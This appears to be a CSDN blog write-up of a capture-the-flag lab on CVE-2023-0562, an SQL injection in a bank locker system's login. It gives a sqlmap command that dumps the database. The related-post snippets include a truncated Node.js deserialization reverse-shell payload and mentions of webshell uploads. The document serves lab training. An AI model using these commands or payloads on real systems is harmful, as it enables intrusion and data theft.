春秋云境靶场之CVE-2023-0562

已于 2024-09-19 22:49:12 修改
阅读量308 收藏 3
点赞数 10
分类专栏: 春秋云境靶场 文章标签: 安全 web安全 sql 安全性测试
于 2024-09-19 22:28:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sjh0590/article/details/142371269
版权

靶标介绍

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

靶机背景

PHPGurukul 银行储物柜管理系统 1.0 中发现一个漏洞。该漏洞被评为严重。该问题影响了组件 Login 的文件 index.php 的一些未知功能。对参数 username 的操纵会导致 sql 注入。攻击可能远程发起。该漏洞已向公众披露,可能会被利用。该漏洞的标识符为 VDB-219716。

攻克过程

1、开启靶机,发现是这样的一个页面

 2、点击Bankers,发现是一个登陆界面

3、根据靶标提示,在username处有注入,那就直接使用burpsuite抓包,使用sqlmap进行爆破,获得flag

sqlmap -r test.txt --batch --dump

sjh0590
关注
专栏目录
春秋云境 | SQL | CVE-2023-0562
weixin_68416970的博客
08-11 379
银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。
春秋云境CVE-2023-48864
2303_76653367的博客
05-09 542
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在安全漏洞,该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。并没有什么线索啊,一开始我还以为是搜索框存在SQL注入,结果并不是。思路还是不够开阔,一直想着对搜索框进行sql注入,结果还是在参考了。2.御剑扫后台,发现install。5.选一个商品,点击批量上架,抓包。3.进入install,开始安装。第一次做这种,思维还是太局限了。4.记住密码,转到后台。
春秋云境CVE-2023-7130
2303_76653367的博客
05-09 567
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.
春秋云境CVE-2023-7105
2303_76653367的博客
05-09 504
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞.3.保存POST包,sqlmap跑,爆库。2.下拉找到搜索框,随便输入,抓包。
春秋云境CVE-2023-50563
2303_76653367的博客
05-16 608
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在SQLI,该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入。
春秋云境CVE-2023-27372
m0_64432806的博客
03-16 680
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞。
春秋云境CVE-2023-50564
2303_76653367的博客
05-17 669
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
春秋云境CVE-2023-1313
m0_64432806的博客
03-27 780
春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
春秋云境CVE-2023-37569
2303_76653367的博客
05-11 256
Online Piggery Management System v1.0 - 存在未授权的文件上传漏洞。1.打开靶场,发现需要登录,密码为admin/password,当时我没猜出来又懒得爆破,直接参考。3.点击右边加号,随便填写信息,上传一句话木马,后缀为jpg。非常简单的文件上传,唯一的难点就是猜密码。5.右键上传的文件,得到文件存放链接。2.进入过后直接找上传文件的地方。4.抓包,将jpg改为php。
春秋云境.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1063
春秋云境.com】CVE-2022-32991思路
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 501
Pluck-CMS-Pluck-4.7.16 后台RCE。
春秋云境CVE-2022-29464
09-05
- *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
春秋云境CVE-2022-23880
11-29
根据提供的引用内容,春秋云境是一个靶场,其中包含了一个名为taoCMS v3.0.2的文件管理系统,该系统存在任意文件上传漏洞CVE-2022-23880。攻击者可以利用该漏洞上传恶意文件并执行任意代码。如果您想了解更多关于该...
CVE-2017-5941 (nodejs 代码执行)
beirry的博客
11-24 1246
vulfocus-nodejs 代码执行 (CVE-2017-5941) 复现环境 攻击机(192.168.95.58) 靶场环境(10.3.61.69) 复现过程 在含有nc文件目录下打开两个cmd,监听8888端口 nc -lvp [端口] 访问环境:http://10.3.61.69:55269 账号随意输入,密码构造payload如下 _$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&amp
网络安全概述:从认知到实践
l1x1n0的博客
10-04 417
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 304
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1293
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值